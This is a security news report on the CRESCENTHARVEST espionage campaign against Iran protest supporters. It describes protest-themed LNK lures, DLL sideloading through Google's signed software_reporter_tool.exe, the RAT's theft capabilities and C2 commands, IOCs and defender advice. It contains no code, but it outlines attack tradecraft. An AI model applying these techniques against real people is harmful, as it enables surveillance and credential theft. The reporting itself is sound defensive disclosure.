CRESCENTHARVEST Campaign Deploys RAT Malware Against Iran Protest Supporters Using DLL Sideloading via Signed Google Binary

Acronis Threat Research Unit (TRU) has disclosed a new espionage campaign dubbed CRESCENTHARVEST that targets supporters of Iran's ongoing protests with a custom remote access trojan designed for long-term surveillance and data theft.

The campaign, observed since January 9, 2026, is believed to be the work of an Iran-aligned threat group, though no formal attribution has been made. It marks the second espionage operation identified targeting individuals connected to the Iranian protest movement — following HarfangLab's discovery last month of the RedKitten campaign deploying the SloppyMIO backdoor against human rights organizations.

Protest-Themed Lures in Farsi

The attackers distribute malicious RAR archives containing what appears to be legitimate protest-related content — images, videos, and a Farsi-language report providing updates from "the rebellious cities of Iran." The pro-protest framing is deliberate, designed to attract Farsi-speaking Iranians seeking information about the demonstrations.

Hidden among the legitimate media are Windows shortcut files using the double extension trick (.jpg.lnk or .mp4.lnk) to disguise themselves as images or videos. When launched, the LNK file executes PowerShell code to retrieve a secondary ZIP archive while simultaneously opening a harmless image or video — giving the victim no indication of compromise.

The initial access vector remains unknown, but Acronis suspects spear-phishing or extended social engineering operations where attackers build rapport with targets before delivering the payload — a well-documented tactic used by Iranian groups like Charming Kitten and Tortoiseshell, who have maintained fake personas for years before weaponizing the relationship.

Signed Binary Abuse and DLL Sideloading

The infection chain leverages a legitimate Google-signed binary — software_reporter_tool.exe, part of Chrome's cleanup utility — to sideload two malicious DLLs:

urtcbased140d_d.dll — a C++ implant that extracts and decrypts Chrome's app-bound encryption keys through COM interfaces, sharing code overlaps with the open-source ChromElevator project

version.dll (CRESCENTHARVEST) — the primary RAT, capable of:

• Enumerating installed antivirus products and security tools
• Harvesting system metadata, browser credentials, and cookies
• Stealing Telegram desktop session data
• Keylogging
• Listing directories and uploading files
• Running shell commands
• Performing anti-analysis checks

The RAT communicates with its C2 server at servicelog-information[.]com using Windows WinHTTP APIs, blending into regular web traffic to evade network-based detection.

Supported C2 Commands

The implant supports a structured command set including Anti (anti-analysis), His (browser history theft), KeyLog (keylogger activation), Tel_s (Telegram session theft), Cook (cookie theft), F_log (credential harvesting), Upload (file exfiltration), and shell (command execution). Notably, the PowerShell execution command (ps) was found to be non-functional in the analyzed sample.

IOCs

• C2 Domain: servicelog-information[.]com
• Sideloaded binary: software_reporter_tool.exe (legitimate Google-signed)
• Malicious DLLs: urtcbased140d_d.dll, version.dll
• Lure format: RAR archives containing .jpg.lnk and .mp4.lnk files alongside legitimate media

Defender Recommendations

• Block LNK execution from archive extractions — flag PowerShell spawned from shortcut files
• Monitor for DLL sideloading — alert on unsigned DLLs loaded by signed Google binaries
• Hunt for WinHTTP-based C2 — inspect outbound connections from software_reporter_tool.exe
• Protect Telegram desktop sessions — monitor for unauthorized access to Telegram's tdata directory
• Brief at-risk communities — organizations supporting Iranian diaspora and protest movements should implement heightened security awareness